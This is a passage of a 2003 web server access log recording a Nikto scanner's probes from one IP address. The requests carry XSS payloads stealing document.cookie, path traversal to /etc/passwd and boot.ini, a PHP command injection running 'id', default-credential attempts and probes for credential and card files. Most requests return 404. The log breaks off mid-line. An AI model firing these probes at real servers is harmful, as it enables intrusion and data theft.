[24/Jul/2003:01:43:34 +0900] "GET /syshelp/stmex.stm?foo=<script>alert(document.cookie)</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:35 +0900] "GET /system/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:36 +0900] "GET /sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:36 +0900] "GET /sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:37 +0900] "GET /sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:38 +0900] "GET /sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:39 +0900] "GET /sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:39 +0900] "GET /sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:40 +0900] "GET /sysuser/docmgr/iecreate.stm?template=../ HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:41 +0900] "GET /sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:41 +0900] "GET /sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:42 +0900] "GET /sysuser/docmgr/ieedit.stm?url=../ HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:43 +0900] "GET /sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:44 +0900] "GET /sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:44 +0900] "GET /sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:45 +0900] "GET /sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:46 +0900] "GET /sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:46 +0900] "GET /sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:47 +0900] "GET /sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:48 +0900] "GET /sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:49 +0900] "GET /sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:49 +0900] "GET /sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:50 +0900] "GET /sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:51 +0900] "GET /sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:51 +0900] "GET /sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:52 +0900] "GET /sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:53 +0900] "GET /sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:54 +0900] "GET /sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:54 +0900] "GET /sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:55 +0900] "GET /sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:56 +0900] "GET /temp/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:56 +0900] "GET /template/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:57 +0900] "GET /templates/form_header.php?noticemsg=<Script>javascript:alert(document.cookie)</Script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:58 +0900] "GET /test/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:59 +0900] "GET /testing/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:59 +0900] "GET /texis.exe/?-dump HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:00 +0900] "GET /texis.exe/?-version HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:01 +0900] "GET /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:02 +0900] "GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:02 +0900] "GET /ticket.php?id=99999 HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:03 +0900] "GET /tmp/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:04 +0900] "GET /tools/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:04 +0900] "GET /TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:05 +0900] "GET /trafficlog/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:07 +0900] "GET /tree/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:08 +0900] "GET /typo3conf/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:09 +0900] "GET /typo3conf/database.sql HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:09 +0900] "GET /typo3conf/localconf.php HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:10 +0900] "GET /updates/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:11 +0900] "GET /upload.php?type=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:12 +0900] "200 /uploader.php HTTP/1.0" 501 340 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:13 +0900] "GET /us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:13 +0900] "GET /usage/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:16 +0900] "GET /user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:16 +0900] "GET /user.php?op=userinfo&uname=<script>alert('hi');</script> HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:17 +0900] "GET /user/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:18 +0900] "GET /usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:19 +0900] "GET /userinfo.php?uid=1; HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:19 +0900] "GET /userlog.php HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:20 +0900] "GET /users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:21 +0900] "GET /users/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:21 +0900] "GET /users/scripts/submit.cgi HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:22 +0900] "GET /ustats/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:23 +0900] "GET /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:24 +0900] "GET /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:24 +0900] "GET /vchat/msg.txt HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:25 +0900] "GET /vfs/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:26 +0900] "GET /vgn/legacy/save HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:26 +0900] "GET /vgn/license HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:27 +0900] "GET /vgn/login HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:28 +0900] "GET /vgn/login/1,501,,00.html?cookieName=x--\\> HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:29 +0900] "GET /vgn/style HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:29 +0900] "GET /vider.php3 HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:30 +0900] "GET /viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:31 +0900] "GET /viewpage.php?file=/etc/passwd HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:31 +0900] "GET /view_source.jsp HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:32 +0900] "GET /w-agora/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:33 +0900] "GET /w3perl/admin HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:34 +0900] "GET /warez/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:34 +0900] "GET /web-console/ServerInfo.jsp%00 HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:35 +0900] "GET /WEB-INF./web.xml HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:36 +0900] "GET /web/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:36 +0900] "GET /web/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:37 +0900] "GET /web800fo/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:38 +0900] "GET /webaccess.htm HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:39 +0900] "GET /webaccess/access-options.txt HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:39 +0900] "GET /webadmin/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:40 +0900] "GET /webalizer/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:41 +0900] "GET /webboard/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:41 +0900] "GET /webcart-lite/ HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:42 +0900] "GET /webcart-lite/config/import.txt HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:43 +0900] "GET /webcart-lite/orders/import.txt HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:44 +0900] "GET /webcart/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:44 +0900] "GET /webcart/carts/ HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:45 +0900] "GET /webcart/config/ HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:46 +0900] "GET /webcart/config/clients.txt HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:46 +0900] "GET /webcart/orders/ HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:47 +0900] "GET /webcart/orders/import.txt HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:48 +0900] "GET /webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:49 +0900] "GET /webdata/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:49 +0900] "GET /weblog/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:50 +0900] "GET /weblogic HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:51 +0900] "GET /weblogs/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:51 +0900] "GET /webmail/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:52 +0900] "GET /webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:53 +0900] "GET /webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&MSPStoreType=image/gif HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:54 +0900] "GET /WebShop/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:54 +0900] "GET /WebShop/logs/cc.txt HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:55 +0900] "GET /WebShop/templates/cc.txt HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:56 +0900] "GET /website/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:57 +0900] "GET /webstats/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:57 +0900] "GET /webtools/bonsai/ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:58 +0900] "GET /webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:59 +0900] "GET /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:44:59 +0900] "GET /webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:00 +0900] "GET /webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:01 +0900] "GET /webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:02 +0900] "GET /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:02 +0900] "GET /webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script> HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:03 +0900] "GET /WebTrend/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:12 +0900] "GET /Web_store/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:12 +0900] "GET /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:13 +0900] "GET /whateverxxxx.html HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:14 +0900] "GET /wikihome/action/conflict.php HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:14 +0900] "GET /wstats/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:15 +0900] "GET /WS_FTP.ini HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:16 +0900] "GET /ws_ftp.ini HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:17 +0900] "GET /wusage/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:17 +0900] "GET /www-sql/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:18 +0900] "GET /www/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:19 +0900] "GET /wwwboard/passwd.txt HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:19 +0900] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:20 +0900] "GET /wwwboard/wwwboard.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:21 +0900] "GET /wwwjoin/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:22 +0900] "GET /wwwlog/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:22 +0900] "GET /wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:23 +0900] "GET /wwwstats.html HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:24 +0900] "GET /wwwstats/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:24 +0900] "GET /wwwthreads/3tvars.pm HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:25 +0900] "GET /wwwthreads/w3tvars.pm HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:26 +0900] "GET /wx/s.dll?d=/boot.ini HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:27 +0900] "GET /xdk/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:27 +0900] "GET /xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:28 +0900] "GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:29 +0900] "GET /zipfiles/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:29 +0900] "GET /z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825& HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:30 +0900] "GET /[SecCheck]/..%252f..%252f../ext.ini HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:31 +0900] "GET /[SecCheck]/..%255c..%255c../ext.ini HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:32 +0900] "GET /[SecCheck]/..%2f../ext.ini HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:32 +0900] "GET /_pages HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:33 +0900] "GET /_vti_bin/fpcount.exe/ HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:34 +0900] "GET /~/<script>alert('Vulnerable')</script>.asp HTTP/1.0" 404 326 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:35 +0900] "GET /~/<script>alert('Vulnerable')</script>.aspx HTTP/1.0" 404 327 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:35 +0900] "GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null HTTP/1.0" 404 327 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:36 +0900] "GET /~root/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:37 +0900] "GET /admin/config.php HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:37 +0900] "GET /adm/config.php HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:38 +0900] "200 /cgi.cgi/ HTTP/1.0" 403 284 "-" "Mozilla/4.75 